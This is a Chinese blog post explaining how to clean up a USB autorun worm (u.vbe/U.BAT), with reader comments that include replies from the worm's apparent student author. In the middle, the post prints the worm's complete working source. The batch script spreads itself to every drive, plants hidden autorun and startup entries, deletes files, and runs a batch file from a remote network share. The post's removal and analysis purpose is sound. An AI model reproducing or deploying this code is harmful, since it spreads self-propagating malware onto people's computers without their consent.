U盘病毒u.vbe和U.BAT的清除办法

       还在吃午饭,手机就“HELLO MOTOR”的叫了起来,是导师打来的,要我下午去给我们系的一位主任修电脑,说病毒清除不掉,重装系统也没用,要硬盘全部格式化,重新分区。心里不免忐忑,这是什么病毒啊??这么厉害,不过只有2种可能,要么就是U盘病毒autorun.inf,要么就是蠕虫,如果蠕虫是替换文件的话,就是癌症,无法修复的,只能全部删除。
     下午跑到他办公室一看,刚刚重新安装的系统,番茄花园的,他说刚刚装的系统,硬盘无法打开。还没有winrar,下载安装个,用winrar打开一看,每个盘下都是那个autorunn.INF,u.vbe和U.BAT,呵呵,U盘病毒。没事,不用分区的。
     download个icesword,调看进程,傻傻的wscript.exe赫然在目。调用费尔木马强力清除助手,同时清除c:\windows\u.bat,c:\windows\u.vbe,c:\windows\s.vbe,钩选第二项“抑制生成”。
清除各个根目录下的autorunn.INF,u.vbe和U.BAT,清除开始菜单启动中的U.bat。在这里有一点很重要,那就是不能有任何的遗漏,不然就前功尽费。

列个常用清除名单:
c:\windows\u.bat
c:\windows\u.vbe
c:\windows\s.vbe
C:\Documents and Settings\All Users.WINDOWS\「开始」菜单\程序\启动\u.vbe
c:\u.bat
c:\u.vbe
c:\autorun.inf
d:\u.bat
d:\u.vbe
d:\autorun.inf
e:\u.bat
e:\u.vbe
e:\autorun.inf
f:\u.bat
f:\u.vbe
f:\autorun.inf

.......

费尔木马强力清除助手的使用:
点击放大图片

    

     [通过和作者接触得知,这个代码确实是其无意传播开来的,也已经认识到问题的严重性!!且积极的提供清除代码。感觉其并不是仇恨社会,无所事事的”愤青“,鉴于其年纪还小,请大家多多宽容!或许将来因为你的这一份宽容成就了一位计算机学家!也希望作者现在好好念书,垒实基础。07.4.17]
      给病毒作者说几句:既然留名肇中高一,我想你是想模仿“熊猫”作者吧,年纪还小,就不要编写这个东西了,利用技术好好干点有用的事情,写病毒可是要坐牢的。另外你也太猖狂了吧,还留地址?想学“熊猫”和大家调侃?
autorun.inf
[quote[AutoRun]
open=wscript.exe u.vbe
shell\open\Command=wscript.exe u.vbe
shell\explore\Command=wscript.exe u.vbe
shell\find\Command=wscript.exe u.vbe
[/quote]

u.vbe
引用内容 引用内容

wscript.createobject("wscript.shell").run """u.bat"" /start",0



U.bat
引用内容 引用内容
@echo off
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
set v=01
set "endf=%systemdrive%\8bye.txt"
call:ie s.vbe
echo.Wscript.sleep 10000>s.vbe
attrib s.vbe +a +s +r +h
if /i not "%cd%"=="%systemroot%" (call:cb&del /a /f /q s.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
uda.a
md "%systemroot%\bakfiles\"
call:ie "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
copy uda-解压.bat "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
call:ie "%systemroot%\bakfiles\uda.a"
call:copy uda.a "%systemroot%\bakfiles\"
:s
echo. >uhere-%v%.txt
if exist "%endf%" (set n=1&goto end)
if "!dl:~%n%,1!"=="" (set n=0&s.vbe&(ping 192.168.2.211 -n 1 &&call \\192.168.2.211\re$\add.bat))
set d=!dl:~%n%,1!:
set /a n=n+1
if not exist %d% (goto s)
if exist "%d%\autorun.inf\" (echo.y|cacls "%d%\autorun.inf" /p everyone:f
rd "%d%\autorun.inf" /s /q)
if exist "%d%\autorun.inf" (fc "%d%\autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盘病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1)
if not exist "%d%\%~n0.vbe" (goto s2)
if not exist "%d%\%~nx0" (goto s3)
if not exist "%d%\uda.a" (goto s4)
if exist %d%\%date:~0,10%.sk (goto s)
:s1
call:inf >%d%\autorun.inf
attrib %d%\autorun.inf +a +s +r +h
call:ie "%d%\%~n0.vbe"
:s2
call:vbe "%~nx0" >"%d%\%~n0.vbe"
attrib "%d%\%~n0.vbe" +a +s +r +h
:s3
call:copy "%~dpnx0" "%d%\"
:s4
call:copy "uda.a" "%d%\"
call:ie %d%\*.sk
echo.>%d%\%date:~0,10%.sk
attrib %d%\%date:~0,10%.sk +a +s +r +h
goto s
:cb
if exist "%systemroot%\uhere-*.txt" (del /a /f /q "%systemroot%\uhere-*.txt"&s.vbe)
if exist "%systemroot%\uhere-*.txt" (if exist "%systemroot%\uhere-%v%.txt" (goto :eof) else (call:v "%systemroot%\uhere-*.txt"&(if %v% lss !v0! (goto :eof))))
call:rm >%systemdrive%\已经被反U盘病毒的“病毒”感染.txt
call:copy "%~dpnx0" "%systemroot%\"
call:copy "uda.a" "%systemroot%\"
call:ie "%systemroot%\%~n0.vbe"
call:vbe "%~nx0" >"%systemroot%\%~n0.vbe"
call:ie "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
call:vbe "%systemroot%\%~nx0" >"%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
start "" /wait /d "%systemroot%\" "%systemroot%\%~n0.vbe"
goto :eof
:v
set "v0=%~nx1"
set /a "v0=%v0:~6,2%"
goto :eof
:rm
echo.        看到这个,请不要慌张。电脑病毒的定义为:1、传播性;2、潜伏性;3、破坏性。根据此定义,本脚本这完全符合1,有点符合2,不符合3(若说破坏性也不是没有,但只针对U盘病毒,而且会在删除文件前备份,备份地址:%systemroot%\bakfiles\),因此,病毒二字加了引号,即不是真正的病毒。本脚本的目的是通过U盘传播,并沿途清理U盘中的病毒,如果可能,会把收集到的病毒文件发给作者;不会给您造成太多不便(与其被U盘病毒感染,不如被本脚本感染啦)。如果您觉得这样给您造成了不便,想卸载本脚本,请在%systemdrive%\下新建一个名为8bye的文本文件(不需要写入内容,即:新建%endf%),大约在20秒内完成卸载,并帮助您进行U盘病毒免疫。欲了解更多,请打开 U盘病毒分析 的自述文件(地址:%systemroot%\readme.txt)。谢谢!
echo.        包含文件:u.bat(本文件,4240字节)、uda.a(21674字节,md5:e6762ebf6123bc17ab31995c61bba955)
echo.        为研究性学习而制作,于2007-03-15,望多多支持!作者:CyyIsGood(肇中高一11),联系:cyyisgood@126.com
goto :eof
:vbe
echo.wscript.createobject("wscript.shell").run """%~1"" /start",0
goto :eof
:inf
echo.[AutoRun]
echo.open=wscript.exe %~n0.vbe
echo.shell\open\Command=wscript.exe %~n0.vbe
echo.shell\explore\Command=wscript.exe %~n0.vbe
echo.shell\find\Command=wscript.exe %~n0.vbe
goto :eof
:ie
if exist "%~1" (del /a /f /q "%~1")
goto :eof
:copy
call:ie "%~dp2%~nx1"
attrib "%~1" -s -h
copy "%~1" "%~dp2"
attrib "%~1" +s +h
attrib "%~dp2%~nx1" +s +h
goto :eof
:ql
cd /d "%systemroot%\"
del /a /f /q Anti-U盘免疫.bat ReadMe.txt uda-解压.bat U盘病毒分析.bat zap.a 主操控.bat 打开发送功能.bat
cd /d "%~dp0"
goto :eof
:end
set d=!dl:~%n%,1!
echo.%d%:\
if exist %d%:\ (del /a /f /q %d%:\u.vbe %d%:\u.bat %d%:\uda.a)
set /a n=n+1
if not "!dl:~%n%,1!"=="" goto end
call U盘病毒分析.bat -c&call:ql&del /a /f /q "%systemdrive%\已经被反U盘病毒的“病毒”感染.txt" "%~dp0s.vbe" "%endf%" inf.tem "uda.a" "%~n0.vbe" "uhere-%v%.txt" "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe" "%~nx0"






以下说明属本文之一部分:
转载请保持完整并注明:转自 金刀客[www.daokers.com]


[本日志由 admin 于 2009-05-31 11:01 AM 编辑]
相关日志:
在线RSS阅读器订阅:
feedsky
抓虾 pageflakes Rojo google reader
my yahoo newsgator bloglines 有道
鲜果 飞豆 哪吒 Netvibes
Netvibes Netvibes

手机订阅:


本站订阅地址:
RSS2:点击复制
Atom:点击复制
        本站所有原创文章均遵循 [创作共用协议]
        本站原创文章可以转载,但须保持完整性并注明出处。
        COPYRIGHT 2008-2010  §  HTTP://WWW.DAOKERS.COM  §    ALL RIGHTS
评论: 8 | 引用: 0 | 查看次数: -
回复回复admin[2007-05-08 09:28 PM | del]
可以的,我截张图吧
回复回复星轨[2007-05-08 04:58 PM | del]
还有费尔木马不能同时删几个的啊
回复回复星轨[2007-05-08 04:54 PM | del]
发现个好地方,顶下....
我是个新手,金刀多多指教
我电脑也中了这个病毒,解9下啦
回复回复daxiaqinwei[2007-04-23 11:27 AM | del]
那个所谓反U盘病毒病毒的作者,你好。可能你不是模仿熊猫烧香,但是如果这件事情继续发展下去,你就有熊猫烧香作者下场的可能。当然这样的结果谁也不愿意看到。希望你能够接受这个教训。
回复回复cyy[2007-04-17 01:11 PM | del]
谢谢管理员的理解,我本意也不是要传出我的学校的,传出去是意外,我会注意的
回复回复admin[2007-04-16 07:06 PM | del]
可是你的这个东西已经让很多不是很熟悉这个程序的朋友无法打开硬盘了,我这段时间几乎天天有朋友加我QQ,询问我清除这个代码的方法。是的,你的程序只是自我传播,没有破坏系统文件,但是已经干扰了很多电脑用户的正常工作。

看了你的说明,写的不错!以后注意不要传播这种东西了
回复回复cyy[2007-04-16 04:33 PM | del]
我不含任何恶意的目的
回复回复cyy[2007-04-16 04:32 PM | del]
留名肇中高一,是因为这是我的研究性学习的产物,我不是为了模仿熊猫烧香

关于清理,请您浏览:
http://cyyisgood.googlepages.com/清理说明
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码提示:单击自动获取验证码
内 容:
最多可输入,当前共,还可输入
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.